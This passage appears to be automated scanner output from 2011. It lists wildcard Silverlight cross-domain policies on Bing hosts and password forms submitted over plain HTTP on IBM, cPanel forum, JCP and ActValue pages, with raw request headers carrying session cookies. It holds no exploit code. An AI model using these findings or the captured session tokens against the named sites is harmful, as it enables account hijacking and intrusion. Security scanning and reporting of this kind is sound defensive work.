Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 17 Sep 2011 00:56:03 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.18. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 17 Sep 2011 00:56:08 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.19. http://ts3.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 17 Sep 2011 00:56:03 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.20. http://ts4.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts4.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 17 Sep 2011 00:56:10 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

7. Cleartext submission of password  previous  next
There are 24 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://dw1.s81c.com/common/js/dynamicnav.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw1.s81c.com
Path:   /common/js/dynamicnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /common/js/dynamicnav.js HTTP/1.1
Host: dw1.s81c.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 02 Sep 2010 13:02:39 GMT
ETag: "1421b-6dc5b9c0"
Accept-Ranges: bytes
Cteonnt-Length: 82459
epKe-Alive: timeout=10, max=63
Content-Type: application/x-javascript
Content-Length: 82459
Cache-Control: max-age=86400
Expires: Sat, 17 Sep 2011 19:55:06 GMT
Date: Fri, 16 Sep 2011 19:55:06 GMT
Connection: close
Vary: Accept-Encoding

if(typeof IOL=="undefined"||IOL==null){var IOL={}}if(typeof PMM=="undefined"||PMM==null){var PMM={}}if(typeof WEBSIGNIN=="undefined"||WEBSIGNIN==null){var WEBSIGNIN={}}var userstate;var ibmWebSigninRe
...[SNIP]...
</p>';if(B==true){A+='<form action="'+WEBSIGNIN.path.PKMS+'" id="userForm" onsubmit="ibmCommonDynamicNavLayerChk(this, \'ssoFPath\'); return false;" method="post">'
}else{A+='<form id="userForm" method="post" name="userForm" onsubmit="return false">
...[SNIP]...
</label><input type="password" value="" size="25" id="password" name="password" maxlength="31"/><input type="hidden" name="login-form-type" value="pwd" />
...[SNIP]...

7.2. http://forums.cpanel.net/calendar.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /calendar.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /calendar.php HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.2.10.1316220231; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:39 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:50:40 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:50:39 GMT; path=/
Content-Length: 39506
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

7.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /f43/connection-imap-server-failed-96021.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /f43/connection-imap-server-failed-96021.html HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:42:54 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:42:53 GMT; path=/
Content-Length: 99145
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
           <form id="navbar_loginform" action="http://forums.cpanel.net/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

7.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jcp.org
Path:   /aboutJava/communityprocess/maintenance/jsr234/index2.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /aboutJava/communityprocess/maintenance/jsr234/index2.html HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=234

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:56 GMT
Content-type: text/html
Content-Length: 17825

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>


<!------------------------------->
<!-- ABOUT THIS HTML -->
<!------------------------------->
<!-- FOLLOW THESE COMMENTS FO
...[SNIP]...
<img src="/images/hd_my-jcp.gif" alt="My JCP" height="18" width="150">


<form name="login" method="post" action="/en/user/login" >
<input name="uri" value="/en/home/index" type="hidden">
...[SNIP]...
<td><input type="password" name="password" style="width:52px" value="" onKeyPress="return handle_keypress(this, event)"></
td>
...[SNIP]...

7.5. http://www.actvalue.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:04 GMT
Content-Length: 42041

<html><head><title>ActValue Consulting &#38; Solutions - Servizi di consulenza e Information Technology - progettazione, realizzazione ed integrazione di tecnologie RFId - Sviluppo e commercializzazio
...[SNIP]...
<tr><FORM id=form4 name=form4
action=/pages/asp/general/login.asp method=post>
<td>
...[SNIP]...
<p align="center"><INPUT type=password name=p></p>
...[SNIP]...

7.6. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /pages/asp/editorial/ps_rfid.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSRBDSBS=MIBFIBDBGCMIPOEOIPCEIHHM

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:36 GMT
Content-Length: 33643

<html><head><title>Tecnologia RFId - Radio Frequency Identification - Tecnologia attiva e passiva - Componenti principali: trasponder (tag), antenna, middleware</title><meta http-equiv="X-UA-Compatibl
...[SNIP]...
<tr><FORM id=form4 name=form4
action=/pages/asp/general/login.asp method=post>
<td>
...[SNIP]...
<p align="center"><INPUT type=password name=p></p>
...[SNIP]...

7.7. http://www.ibm.com/common/js/dynamicnav.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /common/js/dynamicnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /common/js/dynamicnav.js HTTP/1.1
Host: www.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/perf/reports/zvm/html/imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; conxnsCookie=en

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:57 GMT
Server: IBM_HTTP_Server
Cache-Control: max-age=86400
Expires: Sat, 17 Sep 2011 19:42:57 GMT
Last-Modified: Thu, 02 Sep 2010 13:02:39 GMT
ETag: "1421b-6dc5b9c0"
Accept-Ranges: bytes
Cteonnt-Length: 82459
Content-Type: application/x-javascript
Vary: User-Agent, Accept-Encoding
Content-Length: 82459

if(typeof IOL=="undefined"||IOL==null){var IOL={}}if(typeof PMM=="undefined"||PMM==null){var PMM={}}if(typeof WEBSIGNIN=="undefined"||WEBSIGNIN==null){var WEBSIGNIN={}}var userstate;var ibmWebSigninRe
...[SNIP]...
</p>';if(B==true){A+='<form action="'+WEBSIGNIN.path.PKMS+'" id="userForm" onsubmit="ibmCommonDynamicNavLayerChk(this, \'ssoFPath\'); return false;" method="post">'
}else{A+='<form id="userForm" method="post" name="userForm" onsubmit="return false">
...[SNIP]...
</label><input type="password" value="" size="25" id="password" name="password" maxlength="31"/><input type="hidden" name="login-form-type" value="pwd" />
...[SNIP]...

7.8. http://www.ibm.com/developerworks/java/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/java/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:13 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 57486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

7.9. http://www.ibm.com/developerworks/java/find/standards/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/find/standards/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/java/find/standards/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:47 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 100994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

7.10. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

7.11. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</p>
<form class="ibm-column-form" id="sFormId" action="" method="post" name="sForm" onsubmit="return false;">
<p>
...[SNIP]...
<span><input name="password" id="password" size="25" value="" class="required" type="password" onkeypress="handleEP(event,this.form);" /><br />
...[SNIP]...

7.12. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
